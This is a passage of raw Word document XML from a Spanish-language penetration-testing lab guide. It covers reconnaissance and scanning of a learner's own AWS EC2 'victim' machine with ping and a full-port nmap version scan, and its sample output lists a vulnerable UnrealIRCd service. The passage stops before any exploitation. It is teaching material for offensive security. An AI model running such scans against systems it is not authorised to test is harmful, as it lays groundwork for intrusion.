        <w:t>FASE 2: RECONOCIMIENTO (RECONNAISSANCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A6839" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED3FF5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>El reconocimiento es la recolección pasiva y activa de información sobre el objetivo. Es como ser un detective: necesitas saber todo lo posible antes de atacar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB4730" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47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t>Paso 1: Verificar conectividad con el objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A6C438" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Primero, vamos a verificar que la máquina víctima está activa y podemos alcanzarla por la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC272A3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Abre tu terminal en Kali Linux y ejecuta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB485F8" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00532777">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ping -c 4 &lt;REEMPLAZAR_CON_IP_PUBLICA_EC2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84621F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B50FBC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>ping: Herramienta que envía paquetes ICMP (Internet Control Message Protocol) para verificar si un host está activo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44297C48" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>-c 4: Limita el número de paquetes a enviar a solo 4 (en lugar de infinitos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691BFF5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>&lt;IP&gt;: La dirección IP de tu objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DDFC4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Envía pequeños paquetes de datos al servidor objetivo y espera una respuesta. Si la máquina está encendida y accesible, responderá a estos paquetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE19CD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A309EC6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="0075727B">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>64 bytes from X.X.X.X: icmp_seq=1 ttl=64 time=10.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647C87B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="0075727B">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>64 bytes from X.X.X.X: icmp_seq=2 ttl=64 time=9.8 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2D327" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="0075727B">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>64 bytes from X.X.X.X: icmp_seq=3 ttl=64 time=10.1 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB490C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="0075727B">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>64 bytes from X.X.X.X: icmp_seq=4 ttl=64 time=10.0 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE2EF2" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Si ves respuestas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> ¡La máquina está activa y alcanzable!</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Si dice "Destination Host Unreachable":</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Verifica la IP o el Security Group de AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521BCEBB" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="004812B6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="254399C5">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD6CD74" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FASE 3: ESCANEO Y ENUMERACIÓN (SCANNING)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9495BC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654128C8" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Ahora que sabemos que el objetivo está activo, necesitamos descubrir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6788B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>¿Qué puertos están abiertos?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B37F3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>¿Qué servicios están corriendo en esos puertos?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E3BBE" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>¿Qué versiones de software tiene?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6D964" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Esta información nos dirá dónde buscar vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEA45A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47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t>Paso 1: Escaneo básico de puertos con Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF3CE10" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Ejecuta el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63350C95" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00532777">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>nmap -sV -p- -T4 &lt;REEMPLAZAR_CON_IP_PUBLICA_EC2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0530A8FE" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación detallada del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CFCB3A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>nmap: Network Mapper, la herramienta de escaneo de puertos más popular del mundo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB43753" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">-sV: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Version Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> - Detecta las versiones de los servicios que corren en los puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB6165" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-p-: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scan all ports</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> - Escanea TODOS los puertos (del 1 al 65535). Sin este flag, nmap solo escanea los 1000 puertos más comunes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179404EF" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">-T4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timing template</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> - Velocidad de escaneo "agresiva" (escala del 0 al 5, donde 5 es la más rápida pero más detectable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E02DE" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>&lt;IP&gt;: Tu objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710C168" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Nmap envía paquetes especiales a cada puerto de la máquina objetivo para:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8ACEA" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Determinar si el puerto está abierto (acepta conexiones)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E69D9" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Identificar qué servicio está corriendo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF5F55" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Detectar la versión exacta del software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05590DE2" w14:textId="3F5F3370" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiempo estimado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> 2-5 minutos (depende de la velocidad de red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44764DF3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09993B9F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>Starting Nmap 7.94 ( https://nmap.org )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690FC28" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>Nmap scan report for &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1326699E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>Host is up (0.010s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE9921" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>Not shown: 65533 closed tcp ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3572D0" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498257A6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28695D16" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="003A4936">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A5C9EB" w:themeColor="text2" w:themeTint="40"/>
        </w:rPr>
        <w:t>6200/tcp open  irc     UnrealIRCd-3.2.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24F067" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47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t>Paso 2: Analizar los resultados del escaneo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D279056" w14:textId="0D3526F5" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observaciones importantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D902E4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
